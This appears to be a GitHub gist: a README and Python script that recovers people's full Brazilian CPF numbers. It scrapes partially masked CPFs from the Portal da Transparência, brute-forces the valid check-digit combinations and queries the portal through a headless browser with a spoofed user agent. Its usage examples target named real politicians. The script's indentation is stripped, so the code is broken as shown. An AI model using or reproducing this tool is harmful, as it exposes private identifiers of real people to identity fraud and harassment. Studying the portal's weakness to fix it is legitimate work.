

@pedrogarciafreitas
Last active May 31, 2024 21:51
Script to discover the whole CPF from portaldatransparencia.gov.br

BRUTE FORCE CPF FINDER

The CPF (Cadastro de Pessoas Físicas) is an identification number used in Brazil. Each registered person is assigned a unique, individual number. It is required in many everyday situations, such as opening bank accounts, making purchases, and contracting services. To obtain a CPF, one must register with the Federal Revenue Service (Receita Federal).

This script uses one of the main services of the Brazilian federal government to discover information based on the registered citizen's name. It relies on the vulnerability of the Portal da Transparência, which exposes part of the citizen's CPF and censors only the first 3 digits and the verification digits. Since the CPF follows a restricted pattern of digits, by exposing 6 out of a total of 11 digits, the Transparency Portal reduces the number of combinations to 100,000. However, since the CPF uses the last 2 digits for verification of the previous 9, it is possible to reduce the space of possibilities to only 1,000 combinations, which is quite feasible for a brute force attack.

Meaning of the CPF Digits

The CPF consists of 11 digits. It is commonly written by grouping the first nine digits into three groups of three separated by periods, followed by a hyphen and the last two digits. Thus, the CPF number ABCDEFGHIJK is formatted as ABC.DEF.GHI-JK, where J and K are the verification (check) digits.

The digits play different roles. The first eight digits, ABCDEFGH, form the base number assigned by the Federal Revenue Service at the time of registration. The ninth digit, I, indicates the fiscal region where the CPF was issued. The tenth digit, J, is the first verification digit, and the eleventh digit, K, is the second verification digit.

How Verification Digits Work

The first verification digit, J, checks the first nine digits (A through I). The second verification digit, K, checks the nine digits immediately before it (B through J). To compute J, multiply the first nine digits by the weights {10, 9, 8, 7, 6, 5, 4, 3, 2}, respectively (the first digit by 10, the second by 9, and so on). Add the products and take the remainder R of that sum divided by 11. If R is 0 or 1, then J = 0; otherwise, J = 11 - R.

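The second verification digit, K, is calculated with the same rule. The only difference is that the weights {10, 9, 8, 7, 6, 5, 4, 3, 2} are applied to the nine digits starting from the second one (B through J), so J is now the last digit. If S is the remainder of the sum of these products divided by 11, then K = 0 when S is 0 or 1; otherwise, K = 11 - S. Equivalently, K can be computed by weighting all ten digits A through J with {11, 10, ..., 2}. The extra term 11 × A is a multiple of 11, so it does not change the remainder.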
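The check-digit rule above can be sketched in Python as follows. This is a minimal illustration of the arithmetic only. The names `check_digit` and `cpf_check_digits` are hypothetical helpers and are not part of the script below. The base number 111444777 used in the usage example is arbitrary.

```python
from typing import Sequence


def check_digit(digits: Sequence[int]) -> int:
    """Return one CPF verification digit for exactly nine digits.

    The digits are weighted 10, 9, ..., 2. If the remainder of the weighted
    sum modulo 11 is 0 or 1, the digit is 0; otherwise it is 11 - remainder.
    """
    if len(digits) != 9:
        raise ValueError("expected exactly nine digits")
    total = sum(d * w for d, w in zip(digits, range(10, 1, -1)))
    remainder = total % 11
    return 0 if remainder < 2 else 11 - remainder


def cpf_check_digits(base: str) -> str:
    """Given the first nine digits ABCDEFGHI, return the check digits JK."""
    digits = [int(c) for c in base]
    j = check_digit(digits)            # J is computed from A..I
    k = check_digit(digits[1:] + [j])  # K uses B..J with the same weights
    return f"{j}{k}"
```

For example, `cpf_check_digits("111444777")` returns `"35"`, which gives the formatted number 111.444.777-35. For J, the weighted sum is 162 and 162 mod 11 = 8, so J = 3. For K, the weighted sum over B..J is 193 and 193 mod 11 = 6, so K = 5.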

How the Script Works

This script has 2 command-line parameters: --name (mandatory) and --keyword. The --name parameter should contain the full name of the citizen whose CPF you want to discover. If this full name is unique in the database, the script will handle downloading and parsing the partial CPF provided by the Portal da Transparência. Based on this partial CPF, the script generates all possible combinations, finds those valid according to the CPF validation algorithm described above, and then attempts, through brute force, to make a series of requests based on this generated and validated CPF. If the CPF exists in the database, the script notifies. The program stops when the found full name matches the name passed via the --name parameter.

For example, suppose you want to find the CPF of the president of Brazil, Mr. Luiz Inácio Lula da Silva:

python script.py  --name "LUIZ INACIO LULA DA SILVA"

After perform many attempts, the script will report all found CPFs in Portal da Transparência and then stops when the discovered CPF will correspond to the same name passed through --name.

Parameter --keyword: when the full name of the citizen whose CPF you want to discover is unique in the database, the above command is sufficient. However, in some cases, there may be homonymous or very similar names. In these cases, it is possible to pass the pattern of the partial CPF provided by the Transparency Portal itself (e.g., ***.680.938-**). In this case, you should provide the full name (i.e., parameter --name) as well as the --keyword parameter. Thus, the --keyword parameter will be used as the search criterion, and the `--name parameter as the stop criterion.

For instance, suppose you want to discover the complete CPF of the former president of Brazil, Ms. Dilma Vana Rousseff, knowing that part of her CPF is ***.267.246-**, as provided by the Portal da Transparência:

python script.py  --name "DILMA VANA ROUSSEFF" --keyword "***.267.246-**"

Example of execution of this script available in the video: https://youtu.be/c13g8o0wMJs.

import argparse
import re
import copy
from itertools import product
from dataclasses import dataclass
from absl import app
from absl.flags import argparse_flags
from fake_headers import Headers
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver import ChromeOptions
from selenium.common.exceptions import TimeoutException
from tqdm import tqdm
@dataclass
class Person:
name: str
CPF: str
status: str
def __init__(self, name, cpf, status):
self.name = name
self.CPF = cpf
self.status = status
def extract_single_person_pattern_match(match):
name = match.group('name').strip()
cpf = match.group('cpf')
status = match.group('status').strip()
person = Person(name, cpf, status)
return person
def extract_person_info(text):
# Define regex patterns to extract name, CPF, and status
name_pattern = r'(?P<name>[A-Z\s]+)\n'
cpf_pattern = r'CPF (?P<cpf>\*{3}\.\d{3}\.\d{3}-\*\*)\n'
status_pattern = r'(?P<status>.+?)(?=\n[A-Z]|$)'
pattern = name_pattern + cpf_pattern + status_pattern
matches = re.finditer(pattern, text)
person_info_list = [extract_single_person_pattern_match(match)
for match in matches]
return person_info_list
def is_valid_cpf(cpf):
cpf = [int(char) for char in cpf if char.isdigit()]
if len(cpf) != 11:
return False
if cpf == cpf[::-1]:
return False
# Valida os dois dígitos verificadores
for i in range(9, 11):
value = sum((cpf[num] * ((i+1) - num) for num in range(0, i)))
digit = ((value * 10) % 11) % 10
if digit != cpf[i]:
return False
return True
def extract_cpf_parts(cpf):
# Regular expression pattern to extract CPF parts
pattern = r'(\*\*\*).(\d{3}).(\d{3})-(\*\*)'
match = re.match(pattern, cpf)
if match:
first_part = match.group(1)
second_part = match.group(2)
third_part = match.group(3)
last_part = match.group(4)
return first_part, second_part, third_part, last_part
else:
return None
def get_combinations():
triplets = [''.join(map(str, c)) for c in product(range(10), repeat=3)]
tuples = [''.join(map(str, c)) for c in product(range(10), repeat=2)]
combinations = product(triplets, tuples)
return combinations
def get_all_cpfs_by_bruteforce(second_part, third_part):
all_combinations = get_combinations()
all_cpfs = []
for first_part, validation_digit in all_combinations:
parts = (first_part, second_part, third_part, validation_digit)
generated_cpf = "".join(parts)
all_cpfs.append(generated_cpf)
return all_cpfs
def get_all_valid_cpfs(second_part, third_part):
all_cpfs = get_all_cpfs_by_bruteforce(second_part, third_part)
valid_cpfs = [c for c in all_cpfs if is_valid_cpf(c)]
return valid_cpfs
class CPFFinder:
url = "https://portaldatransparencia.gov.br/pessoa-fisica/busca/lista?"
def __init__(self, name: str, keyword: str):
self.name = name
self.keyword = keyword
self.url = CPFFinder.url
self._start_crawler()
def _start_crawler(self):
header = Headers(browser="chrome", os="win", headers=False)
customUserAgent = header.generate()['User-Agent']
options = ChromeOptions()
options.add_argument('--headless')
options.add_argument("--enable-javascript")
options.add_argument(f"user-agent={customUserAgent}")
self.driver = webdriver.Chrome(options=options)
def _get_remote_info(self, keyword: str, wait_seconds: int = 5):
driver = copy.copy(self.driver)
driver.get(self.url)
input_field = driver.find_element(By.ID, "termo")
button = driver.find_element(By.ID, "btnBuscar")
input_field.send_keys(f"\"{keyword}\"")
input_field.send_keys(Keys.ENTER)
button.click()
try:
wait = WebDriverWait(driver, wait_seconds)
dynamic_content = wait.until(
EC.visibility_of_element_located((By.ID, "resultados")))
results = extract_person_info(dynamic_content.text)
return results
except TimeoutException:
return self._get_remote_info(keyword, wait_seconds + 10)
def _try_single_cpf(self, cpf):
results = self._get_remote_info(cpf)
if len(results) == 1:
found_person = Person(results[0].name, cpf, results[0].status)
print(f"{found_person} exists in DB.")
if self.name.lower() == found_person.name.lower():
return found_person
return None
def _try_cpfs_by_bruteforce(self, incomplete_cpf):
_, second_part, third_part, _ = extract_cpf_parts(incomplete_cpf)
valid_cpfs = get_all_valid_cpfs(second_part, third_part)
for cpf in (pbar := tqdm(valid_cpfs)):
pbar.set_description(f"Trying CPF {cpf}")
result = self._try_single_cpf(cpf)
if result:
return result
return None
def run(self):
if self.keyword is None:
results = self._get_remote_info(self.name)
if len(results) != 1:
msg = "Many results with this pattern."
msg += "Try a more specific one."
print(msg)
else:
incomplete_cpf = results[0].CPF
else:
incomplete_cpf = self.keyword
print(f"Parcial CPF: {incomplete_cpf}")
matched_person = self._try_cpfs_by_bruteforce(incomplete_cpf)
if matched_person:
print(f"Found -> {matched_person}")
def parse_args(argv):
parser = argparse_flags.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument(
'--name',
type=str,
help='Nome completo da pessoa que se deseja descobrir o CPF',
)
parser.add_argument(
'--keyword',
type=str,
help='CPF parcial da pessoa',
default=None
)
return parser.parse_args(argv[1:])
def main(args):
CPFFinder(args.name, args.keyword).run()
if __name__ == "__main__":
app.run(main, flags_parser=parse_args)